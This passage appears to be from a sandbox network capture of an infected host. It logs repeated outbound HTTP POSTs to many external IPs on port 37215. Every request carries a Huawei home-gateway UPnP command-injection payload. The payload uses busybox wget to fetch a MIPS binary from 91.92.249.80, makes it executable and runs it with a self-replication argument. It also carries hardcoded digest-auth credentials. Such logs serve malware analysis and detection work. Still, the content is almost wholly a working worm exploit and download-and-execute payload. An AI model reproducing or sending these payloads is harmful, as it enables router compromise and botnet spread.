                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1371192.168.2.2340116102.139.39.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338423014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1372192.168.2.234157650.206.33.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338438988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1373192.168.2.234186841.4.103.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338490963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1374192.168.2.234511497.41.214.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338506937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1375192.168.2.2347646157.48.200.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338563919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1376192.168.2.2337350167.236.206.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338568926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1377192.168.2.234227641.206.23.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338587999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1378192.168.2.233691041.115.228.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.340940952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1379192.168.2.2356732157.35.151.22037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.340989113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1380192.168.2.2359126197.61.45.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.340997934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
